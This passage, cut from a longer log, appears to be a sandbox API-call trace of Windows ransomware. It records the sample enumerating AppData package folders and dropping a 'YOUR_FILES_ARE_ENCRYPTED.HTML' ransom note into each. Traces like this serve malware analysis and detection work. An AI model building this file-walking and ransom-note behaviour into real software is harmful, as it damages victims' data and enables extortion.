2 [0121.778] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="2D") returned 2 [0121.778] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="C3") returned 2 [0121.778] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="1D") returned 2 [0121.778] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="27") returned 2 [0121.778] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="04") returned 2 [0121.778] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="E6") returned 2 [0121.778] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="C2") returned 2 [0121.778] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="26") returned 2 [0121.778] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="56") returned 2 [0121.778] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="1B") returned 2 [0121.779] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat" [0121.779] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.779] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.779] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x94d8a887, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x94d8a887, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94d8a887, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0121.779] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.779] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 110 [0121.779] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.779] lstrlenW (lpString=".LOG1") returned 5 [0121.779] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.779] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x94d8a887, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x94d8a887, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94d8a887, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0121.779] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.779] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 110 [0121.779] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.779] lstrlenW (lpString=".LOG2") returned 5 [0121.779] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.779] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x94d8a887, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x94d8a887, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x94d8a887, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0121.779] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.779] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0121.779] GetProcessHeap () returned 0x600000 [0121.779] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.780] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.781] CloseHandle (hObject=0x31c) returned 1 [0121.781] GetProcessHeap () returned 0x600000 [0121.781] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.781] GetProcessHeap () returned 0x600000 [0121.781] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.781] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0121.781] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.781] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData") returned 97 [0121.781] GetProcessHeap () returned 0x600000 [0121.781] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.781] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData" [0121.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\*" [0121.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0121.782] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 1 [0121.782] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 0 [0121.782] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0121.782] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0121.782] GetProcessHeap () returned 0x600000 [0121.782] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.783] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.784] CloseHandle (hObject=0x31c) returned 1 [0121.784] GetProcessHeap () returned 0x600000 [0121.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.784] GetProcessHeap () returned 0x600000 [0121.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.784] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0121.784] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.784] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState") returned 93 [0121.784] GetProcessHeap () returned 0x600000 [0121.784] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.784] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState" [0121.784] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\*" [0121.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.784] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 1 [0121.784] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 0 [0121.784] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.784] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0121.784] GetProcessHeap () returned 0x600000 [0121.784] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.785] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.786] CloseHandle (hObject=0x31c) returned 1 [0121.786] GetProcessHeap () returned 0x600000 [0121.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.786] GetProcessHeap () returned 0x600000 [0121.786] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.786] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0121.786] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.786] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0121.786] GetProcessHeap () returned 0x600000 [0121.786] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.787] WriteFile (in: hFile=0x214, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.788] CloseHandle (hObject=0x214) returned 1 [0121.788] GetProcessHeap () returned 0x600000 [0121.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.788] GetProcessHeap () returned 0x600000 [0121.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.789] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Windows.PrintDialog_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.PRI")) returned 1 [0121.789] StrStrIW (lpFirst="Windows.PrintDialog_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.789] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy") returned 82 [0121.789] GetProcessHeap () returned 0x600000 [0121.789] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.790] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy" [0121.790] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\*" [0121.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626978 [0121.792] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.792] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0121.792] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.792] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC") returned 85 [0121.792] GetProcessHeap () returned 0x600000 [0121.792] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.793] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC" [0121.793] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\*" [0121.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.796] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 1 [0121.796] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 0 [0121.797] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.797] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 